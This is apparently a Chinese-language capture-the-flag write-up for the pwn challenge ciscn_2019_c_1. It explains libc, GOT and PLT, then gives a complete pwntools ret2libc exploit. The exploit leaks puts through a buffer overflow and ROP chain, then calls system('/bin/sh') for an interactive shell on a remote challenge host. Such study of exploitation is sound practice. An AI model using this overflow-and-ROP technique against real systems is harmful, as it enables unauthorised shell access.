ciscn_2019_c_1
前提知识点:
libc和got,plt表
网上解释很多
我就讲一下我粗俗的理解
我们在编写代码利用了很多库函数,这个库函数藏在libc里面(编译链接的知识)
然后对于程序运行,比如我们在libc里面引用了puts函数
程序先去看plt表,plt粗俗理解就是 call puts。第一次plt表里面需要先去寻找got表,got表里面就是编译链接的时候存储的libc的函数地址信息什么的
真实地址=libc基地址+offset(偏移)
每个libc版本,有不同的
ai给的解释
好的!我来用最通俗的方式解释一下 libc、GOT、PLT 是什么,以及它们之间的关系。假设你写了一个程序,里面用了
printf这个函数(比如printf("Hello World");),但你的程序本身并没有实现printf,而是调用了操作系统提供的库函数。这时候,libc、GOT、PLT就派上用场了。
1. libc 是什么?
- libc 就是操作系统提供的一个“工具箱”,里面装满了各种常用函数(比如
printf、malloc、system等)。- 你可以把
libc想象成一个图书馆,里面有很多“书”(函数),你的程序需要的时候就去图书馆借书用。- 举个例子:你想用
printf,但你的程序本身不包含这个函数的代码,而是从libc里“借”来的。libc里的函数地址是固定的(比如某个偏移量),但程序运行时,这些地址会被随机化(ASLR机制),所以需要动态查找。
2. GOT 和 PLT 是什么?
假设你的程序要调用
printf,但printf的真实地址在运行时才确定(因为 ASLR 随机化了地址)。这时候,PLT 和 GOT 就成了你的“导航地图”。PLT(Procedure Linkage Table)
- PLT 就是一张“跳转表”,每个函数调用(比如
printf)在 PLT 中都有一个对应的“跳板”。- 第一次调用函数时:PLT 会跳转到 GOT 表,看看有没有这个函数的地址。如果 GOT 表里没有,PLT 会触发动态链接器去查找
libc中的真实地址,并更新 GOT 表。- 之后调用函数时:PLT 直接从 GOT 表中读取地址,直接跳转到真实函数,不再需要查找。
GOT(Global Offset Table)
- GOT 是一个“全局地址表”,存储了所有外部函数(比如
printf)的真实地址。- 作用:当程序运行时,GOT 表会记录每个函数的地址。比如,
printf的真实地址会被写入 GOT 表的某个位置。- 为什么需要 GOT? 因为程序运行时,
libc的地址是随机的(ASLR),所以需要一个地方存储这些动态查找后的地址。
3. 粗俗类比
想象你去图书馆借书(调用
printf):
- PLT 是图书馆的“借书指南”,上面写着:“要借《printf》这本书,先去问管理员(GOT)。”
- GOT 是管理员的“书架清单”,管理员说:“《printf》这本书的地址是 0x12345678。”
- libc 是图书馆里实际存放书的地方,地址 0x12345678 对应的就是
printf函数的代码。
4. 动态链接的流程
- 第一次调用
printf:
- 程序看到
printf被调用了,跳转到printf@PLT。printf@PLT会检查printf@GOT(GOT 表中的printf地址)。- 如果
printf@GOT是空的(未解析),PLT 会触发动态链接器去libc中查找printf的真实地址,并更新printf@GOT。- 之后调用
printf:
- 程序直接从
printf@GOT中读取地址,跳转到真实函数,不需要再查找。
5. 真实地址的计算
- 真实地址 = libc 基地址 + 偏移量
- libc 基地址:程序运行时,
libc被加载到内存中的起始地址(因为 ASLR,每次运行都会不同)。- 偏移量:
printf在libc中的固定偏移(比如printf的偏移是0x00060710)。- 真实地址:
libc 基地址 + 0x00060710。
6. 总结
- libc:提供所有常用函数的“图书馆”。
- GOT:记录函数真实地址的“管理员清单”。
- PLT:帮助程序调用函数的“跳板”,第一次调用时找 GOT,之后直接用 GOT 中的地址。
关键点:
- 程序调用
printf时,不会直接去libc找地址,而是通过 PLT 和 GOT 的配合,按需加载并缓存地址。- 这种机制叫 延迟绑定(Lazy Binding),节省内存和时间,只在需要时才查找函数地址。
1. 什么是 libc 的偏移量?
- 偏移量(offset) 是指某个函数在
libc库中的固定位置(相对于libc的起始地址)。
- 例如:
system函数在某个libc版本中的偏移可能是0x45390,puts的偏移可能是0x7f000。- 这些偏移量在 同一版本的 libc 中是固定的,但不同版本的 libc 可能会有不同的偏移。
实操
运行一下
去找找漏洞点
get漏洞
溢出0x50
我们去找到pop rdi 和retn的地址
利用puts函数,利用puts去打libc
第一段exp
from pwn import *
from LibcSearcher import *elfpath = 'ciscn_2019_c_1'
# io = process(elfpath)
io = remote("node5.buuoj.cn", 26175)
elf = ELF(elfpath)context(arch=elf.arch, os=elf.os, log_level="debug")rdi_ret_addr = 0x400c83
ret_addr = 0x4006b9
main_addr = 0x400B28
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']# 第一次发送:加密选项
io.recvuntil(b'Input your choice!\n') # 确保接收到菜单提示符
io.sendline(b'1') # 选择加密选项
# 构造 payload 泄露 puts 地址
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter(b'encrypted\n', payload)
解释:
首先
这里有strlen,我们直接输入\0,那么跳过了那些所谓的加密啥的
然后就是溢出
p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
讲putsgot表作为参数,打印出来
然后再回到main函数,下一段exp
确定libc版本
# 接收菜单多余输出
io.recvline() # 接收 "2.Decrypt\n"
io.recvline() # 接收 "3.Exit\n"# 接收 puts 地址
puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
print(hex(puts_addr))# 计算 libc 基址
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')因为我们又运行了main函数,所以他还会有两个\n,我们过滤一下
下面计算libc得到backdoor的函数,就是一套一套的,没啥可讲
然后就是第二段exp
第二段exp
# 第二次发送:调用 system("/bin/sh")
io.recvuntil(b'Input your choice!\n') # 确保接收到菜单提示符
io.sendline(b'1') # 选择加密选项
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(ret_addr) + p64(rdi_ret_addr) + p64(binsh) + p64(system)
io.sendlineafter(b'encrypted\n', payload)一样的,再次利用,然后执行system
总exp
from pwn import *
from LibcSearcher import *elfpath = 'ciscn_2019_c_1'
# io = process(elfpath)
io = remote("node5.buuoj.cn", 26175)
elf = ELF(elfpath)context(arch=elf.arch, os=elf.os, log_level="debug")rdi_ret_addr = 0x400c83
ret_addr = 0x4006b9
main_addr = 0x400B28
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']# 第一次发送:加密选项
io.recvuntil(b'Input your choice!\n') # 确保接收到菜单提示符
io.sendline(b'1') # 选择加密选项
# 构造 payload 泄露 puts 地址
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter(b'encrypted\n', payload)# 接收菜单多余输出
io.recvline() # 接收 "2.Decrypt\n"
io.recvline() # 接收 "3.Exit\n"# 接收 puts 地址
puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
print(hex(puts_addr))# 计算 libc 基址
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')# 第二次发送:调用 system("/bin/sh")
io.recvuntil(b'Input your choice!\n') # 确保接收到菜单提示符
io.sendline(b'1') # 选择加密选项
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(ret_addr) + p64(rdi_ret_addr) + p64(binsh) + p64(system)
io.sendlineafter(b'encrypted\n', payload)# 进入交互模式
io.interactive()